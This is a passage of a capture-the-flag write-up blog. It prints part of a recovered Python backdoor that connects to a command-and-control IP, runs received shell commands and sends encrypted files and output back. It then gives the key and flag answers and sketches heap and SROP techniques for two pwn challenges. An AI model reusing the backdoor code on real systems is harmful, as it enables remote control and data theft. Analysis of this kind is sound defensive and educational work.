punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n                bytes_read <span class=\"token operator\">=</span> f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n            bytes_enc <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span>bytes_read<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            filesize <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>bytes_enc<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>filesize<span class=\"token punctuation\">)</span>\n            vsb <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>sendall<span class=\"token punctuation\">(</span>bytes_enc<span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">elif</span> message <span class=\"token keyword\">not</span> <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token boolean\">None</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token 
punctuation\">,</span> <span class=\"token string\">'\\n'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n            answer <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>popen<span class=\"token punctuation\">(</span>message<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n            <span class=\"token keyword\">if</span> answer<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">b''</span><span class=\"token punctuation\">:</span>\n                client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span><span class=\"token string\">\"Bad command!\"</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">\"ascii\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">continue</span>\n\n            enc_answer <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span>answer<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            size <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>enc_answer<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>size<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            ch <span class=\"token operator\">=</span> client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> ch <span class=\"token operator\">==</span> <span class=\"token string\">'ok'</span><span class=\"token punctuation\">:</span>\n                client<span class=\"token punctuation\">.</span>sendall<span class=\"token punctuation\">(</span>enc_answer<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Main routine</span>\n<span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n            client <span class=\"token operator\">=</span> socket<span class=\"token punctuation\">.</span>socket<span class=\"token punctuation\">(</span>socket<span class=\"token punctuation\">.</span>AF_INET<span class=\"token punctuation\">,</span> socket<span class=\"token punctuation\">.</span>SOCK_STREAM<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>connect<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token string\">'13.61.7.218'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">55155</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            user <span class=\"token 
operator\">=</span> os<span class=\"token punctuation\">.</span>popen<span class=\"token punctuation\">(</span><span class=\"token string\">'whoami'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n            k <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>SystemRandom<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>choice<span class=\"token punctuation\">(</span>string<span class=\"token punctuation\">.</span>ascii_letters <span class=\"token operator\">+</span> string<span class=\"token punctuation\">.</span>digits<span class=\"token punctuation\">)</span> <span class=\"token keyword\">for</span> _ <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>user<span class=\"token punctuation\">}</span></span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>SEPARATOR<span class=\"token punctuation\">}</span></span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>k<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>settimeout<span class=\"token punctuation\">(</span><span class=\"token number\">600</span><span class=\"token punctuation\">)</span>\n\n            receive_thread <span class=\"token operator\">=</span> threading<span class=\"token punctuation\">.</span>Thread<span class=\"token punctuation\">(</span>target<span class=\"token operator\">=</span>receive<span class=\"token punctuation\">,</span> args<span class=\"token operator\">=</span><span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n            receive_thread<span class=\"token punctuation\">.</span>start<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">50</span><span class=\"token punctuation\">)</span></code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 4. What is the IP address and port used by the malware to establish a connection with the Command and Control (C2) server?</span>\n<span class=\"token number\">13.61</span>.7.218\n\n<span class=\"token comment\"># 5. 
What encryption key did the attacker use to secure the data?</span>\n5UUfizsRsP7oOCAq</code></pre></div>\n<p>Finally, I decrypted the byte data extracted from the packet capture using this key.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/73559b8ccae9ce3d802640fc25d55b8f/636d3/image-20250323180725235.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVQoz11Qy07DMBDsr1BUGqkK9Bmljp1IHMoFqeLCAYm8+1PNw0Jqv3OZtePQcljN7npndtaTqMsp1iWpviTOGVVfGJRADjcjuszUia5M7uqozSi+nig4vdHECd2SZZ8bZIITZsGoz29minGxgKC61lbQDYvBnXVrSSxgHKPHrv6LWYeoO/Qv1SCIgUTXo/24/ztfjmS7xBDveiXt25QU+upS07Y+4GRslxrb2I2257EzDmGwGHBwrMu7EJ11qPCHO+OwweciwvM3yQYiTUqyBbnhyEwuzqmZiZCbNwS7kq7Gu/wpKajg8P3rgw6fR9q8hvSS7GghljTbLmiJ3Fcbmgc+rfHmhc/0sJrTdO2NOF15Bh+Bs71PT+D9Am5gKIr0BonSAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/73559b8ccae9ce3d802640fc25d55b8f/8ac56/image-20250323180725235.webp 240w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/d3be9/image-20250323180725235.webp 480w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/e46b2/image-20250323180725235.webp 960w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/41bb6/image-20250323180725235.webp 1222w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/73559b8ccae9ce3d802640fc25d55b8f/8ff5a/image-20250323180725235.png 
240w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/e85cb/image-20250323180725235.png 480w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/d9199/image-20250323180725235.png 960w,\n/static/73559b8ccae9ce3d802640fc25d55b8f/636d3/image-20250323180725235.png 1222w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/73559b8ccae9ce3d802640fc25d55b8f/d9199/image-20250323180725235.png\"\n            alt=\"image-20250323180725235\"\n            title=\"image-20250323180725235\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>In the end, by obtaining the hash of the PDF file decrypted with the following code, I was able to collect all the Flags.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"download.dat\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    data <span class=\"token operator\">=</span> f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nkey <span class=\"token operator\">=</span> <span class=\"token string\">\"5UUfizsRsP7oOCAq\"</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"ans\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span 
class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>dec_mes<span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">,</span>key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># 8fde053c8e79cf7e03599d559f90b321</span></code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 6, What is the MD5 hash of the file exfiltrated by the attacker?</span>\n8fde053c8e79cf7e03599d559f90b321</code></pre></div>\n<h2 id=\"blessingpwn\" style=\"position:relative;\"><a href=\"#blessingpwn\" aria-label=\"blessingpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Blessing(Pwn)</h2>\n<blockquote>\n<p>In the realm of Eldoria, where warriors roam, the Dragon’s Heart they seek, from bytes to byte’s home. 
Through exploits and tricks, they boldly dare, to conquer Eldoria, with skill and flair.</p>\n</blockquote>\n<p>Analyzing the ELF file provided as the challenge binary showed that the following function was implemented.</p>\n<p>Looking at this code, you can see that if you can overwrite the first value of the heap allocated by <code class=\"language-text\">malloc(0x30000)</code> from 1 to 0, you can obtain the Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 832px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b61c5d31ce46479cd474968f65147d15/ef6b9/image-20250324184413573.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 97.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b61c5d31ce46479cd474968f65147d15/8ac56/image-20250324184413573.webp 240w,\n/static/b61c5d31ce46479cd474968f65147d15/d3be9/image-20250324184413573.webp 480w,\n/static/b61c5d31ce46479cd474968f65147d15/de44a/image-20250324184413573.webp 832w\"\n              sizes=\"(max-width: 832px) 100vw, 832px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b61c5d31ce46479cd474968f65147d15/8ff5a/image-20250324184413573.png 240w,\n/static/b61c5d31ce46479cd474968f65147d15/e85cb/image-20250324184413573.png 480w,\n/static/b61c5d31ce46479cd474968f65147d15/ef6b9/image-20250324184413573.png 832w\"\n            sizes=\"(max-width: 832px) 100vw, 832px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/b61c5d31ce46479cd474968f65147d15/ef6b9/image-20250324184413573.png\"\n            alt=\"image-20250324184413573\"\n            title=\"image-20250324184413573\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>There did not seem to be a usable BoF, but I found the clearly suspicious code <code class=\"language-text\">(buf + var_30 -1) = 0</code>, so I abused that instead.</p>\n<p>Since <code class=\"language-text\">malloc</code> returns 0 when it fails to allocate memory, this looked exploitable.</p>\n<p>Fortunately, the address of the memory region allocated by <code class=\"language-text\">malloc(0x30000)</code> was large enough to cause <code class=\"language-text\">malloc</code> to overflow, so simply providing that value as input was enough to obtain the Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 931px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dbedc1ddd2439449c285045cc03a7071/82b28/image-20250324184350589.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.74999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dbedc1ddd2439449c285045cc03a7071/8ac56/image-20250324184350589.webp 240w,\n/static/dbedc1ddd2439449c285045cc03a7071/d3be9/image-20250324184350589.webp 480w,\n/static/dbedc1ddd2439449c285045cc03a7071/c4004/image-20250324184350589.webp 931w\"\n              sizes=\"(max-width: 931px) 100vw, 
931px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dbedc1ddd2439449c285045cc03a7071/8ff5a/image-20250324184350589.png 240w,\n/static/dbedc1ddd2439449c285045cc03a7071/e85cb/image-20250324184350589.png 480w,\n/static/dbedc1ddd2439449c285045cc03a7071/82b28/image-20250324184350589.png 931w\"\n            sizes=\"(max-width: 931px) 100vw, 931px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dbedc1ddd2439449c285045cc03a7071/82b28/image-20250324184350589.png\"\n            alt=\"image-20250324184350589\"\n            title=\"image-20250324184350589\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"laconicpwn\" style=\"position:relative;\"><a href=\"#laconicpwn\" aria-label=\"laconicpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Laconic(Pwn)</h2>\n<blockquote>\n<p>Sir Alaric’s struggles have plunged him into a deep and overwhelming sadness, leaving him unwilling to speak to anyone. 
Can you find a way to lift his spirits and bring back his courage?</p>\n</blockquote>\n<p>Analyzing the provided file showed that it was a tiny shellcode-style binary like the following.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 450px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0297a8817507afcbf932806d5ee4c7fe/fc2a6/image-20250324185609620.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 44.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0297a8817507afcbf932806d5ee4c7fe/8ac56/image-20250324185609620.webp 240w,\n/static/0297a8817507afcbf932806d5ee4c7fe/8626f/image-20250324185609620.webp 450w\"\n              sizes=\"(max-width: 450px) 100vw, 450px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0297a8817507afcbf932806d5ee4c7fe/8ff5a/image-20250324185609620.png 240w,\n/static/0297a8817507afcbf932806d5ee4c7fe/fc2a6/image-20250324185609620.png 450w\"\n            sizes=\"(max-width: 450px) 100vw, 450px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0297a8817507afcbf932806d5ee4c7fe/fc2a6/image-20250324185609620.png\"\n            alt=\"image-20250324185609620\"\n            title=\"image-20250324185609620\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Also, no security 
mitigations were enabled in particular.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/afa26/image-20250324190144622.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15.833333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiUlEQVQI15XK2w6CMBBF0RZUNNBY8Aa0FguKROP/f962KBpffViZOWdGlL7g/DAYv6EfrrT9jeYyUDuPaTqqo+dgHKU9sa8su9K+5pitcxhTo3ONUoosSxFZqvBtxyqecw+FWyboZEEkBFIKokgiwh5N++jTS/k23r+0XpNvC+IQuskpmP0+/eEJKK9EQtWWxAMAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/8ac56/image-20250324190144622.webp 240w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/d3be9/image-20250324190144622.webp 480w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/e46b2/image-20250324190144622.webp 960w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/c681e/image-20250324190144622.webp 1258w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/8ff5a/image-20250324190144622.png 240w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/e85cb/image-20250324190144622.png 480w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/d9199/image-20250324190144622.png 960w,\n/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/afa26/image-20250324190144622.png 1258w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            
class=\"gatsby-resp-image-image\"\n            src=\"/static/1cdb5bf40d2b3ab7d9bc8177d9738eca/d9199/image-20250324190144622.png\"\n            alt=\"image-20250324190144622\"\n            title=\"image-20250324190144622\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This binary has a stack overflow vulnerability at the point where it receives input with <code class=\"language-text\">read</code>.</p>\n<p>It also contains the address of <code class=\"language-text\">/bin/sh\\x00</code> and a <code class=\"language-text\">pop rax ; ret</code> gadget, so it looked like it should be possible to get a shell somehow from there.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 605px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/90cbd/image-20250324185554105.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.583333333333336%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABiUlEQVQoz32R2ZKiQBBFCxEUEUE2ATc2kcVu0R57ev7/w84U0t0zDxPzcCOrIu49VZkphBAURU7btTzefxCGAZ7v0TQ1WZ6h6zqDZ9C+FCxX49nOaxb+BnsZMtWNb49QFIXqfOJ2v/L+8cCXsDiJeLleOFWlhKaoqvo0p2eB443BVVZhhTF2uMfYbD+BylAF1enM68uVj5+/CPyAJEm49XeauqFrO1zXfQaOlQS5I9Bt75jxDt9J8d0cfbYaoYZhkHYB1VtM/dhiBwZebFH2MVFukxRr9MX0aT6cBJudwNsIDN9n63pkukXtHKlMl/lMQ6jqRAYU1Pnwg4jtIZIBi6JNaK8pJ1nzYkdZZqw9HdNSsBzZmiKYyUdMKeOzqhN1bPlLeZpTlGciT6PJNPrGoi2XUnPeOo3YV5nNlti2w2Qy+bOIcXZfknTTxFpZXC4dt1svt57JOYZ0l5b+9oqmqSjDTxaCqSb+Dv9LQoZjDoc9URw94c56zTE9Pu9hGDLMefAFiXzc+j/wN6Lrv9mQcWJyAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/8ac56/image-20250324185554105.webp 240w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/d3be9/image-20250324185554105.webp 480w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/a9b84/image-20250324185554105.webp 605w\"\n              sizes=\"(max-width: 605px) 100vw, 605px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/8ff5a/image-20250324185554105.png 240w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/e85cb/image-20250324185554105.png 480w,\n/static/df6ff4aaed7ec9cc3a081ea8f73192e5/90cbd/image-20250324185554105.png 605w\"\n            sizes=\"(max-width: 605px) 100vw, 605px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/df6ff4aaed7ec9cc3a081ea8f73192e5/90cbd/image-20250324185554105.png\"\n            alt=\"image-20250324185554105\"\n            title=\"image-20250324185554105\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This time, because <code 
class=\"language-text\">rax</code> and <code class=\"language-text\">rsi</code> can be controlled arbitrarily, it looked possible to obtain a shell using <code class=\"language-text\">rt_sigreturn</code> with Sigreturn Oriented Programming. (I did not know it before, but apparently this is a classic technique.)</p>\n<p>Reference: <a href=\"https://www.aynakeya.com/articles/ctf/pwn-srop-power-of-sigreturn/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Pwn - Sigreturn Oriented Programming (SROP) Technique | Aynakeya’s Blog</a></p>\n<p>Reference: <a href=\"https://inaz2.hatenablog.com/entry/2014/07/30/021123\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Trying ASLR+DEP+RELRO bypass via Sigreturn Oriented Programming on x64 - Momoiro Technology</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 946px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7d02f02faaf1a86878edcbc55e8cd525/36c33/image-20250328231412469.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABHElEQVQoz5WR226DMBBEDQYqfMUQlVAgQICEPPT/P2+6615fWqkPo+NdWePZtah7g+Fe43I06OYew/XAuN7RLzuG5YZ+3vEybegu18h2mNH2U6wv6w3rtqLrzqibGsZoiDwrcBwPWGWxnho8nk84E7UqkWUSeZ4hz1gyknuZlO8kSToLIb4lZYppmZBQMZJupJVU/rz0Hxmnse0bGoq8NE1MuVceI9WeaK2BdZZo4YhaayRJ8rvhSPO35xZVqFAaAxcClHNwZFYUBUQikKbpl/40Y+3LjGme4utswHsp8pxIeyNyjynj3t57zM9+PD8VkdHwlcZtKSWPHChlqMPHOcB7j4qSeu+gKT3/Io+vtIKjHq+hpM/je0qpaPgG9mye3ygFq3IAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/7d02f02faaf1a86878edcbc55e8cd525/8ac56/image-20250328231412469.webp 240w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/d3be9/image-20250328231412469.webp 480w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/30833/image-20250328231412469.webp 946w\"\n              sizes=\"(max-width: 946px) 100vw, 946px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7d02f02faaf1a86878edcbc55e8cd525/8ff5a/image-20250328231412469.png 240w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/e85cb/image-20250328231412469.png 480w,\n/static/7d02f02faaf1a86878edcbc55e8cd525/36c33/image-20250328231412469.png 946w\"\n            sizes=\"(max-width: 946px) 100vw, 946px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7d02f02faaf1a86878edcbc55e8cd525/36c33/image-20250328231412469.png\"\n            alt=\"image-20250328231412469\"\n            title=\"image-20250328231412469\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"about-sigreturn-oriented-programmingsrop\" style=\"position:relative;\"><a href=\"#about-sigreturn-oriented-programmingsrop\" aria-label=\"about sigreturn oriented programmingsrop permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 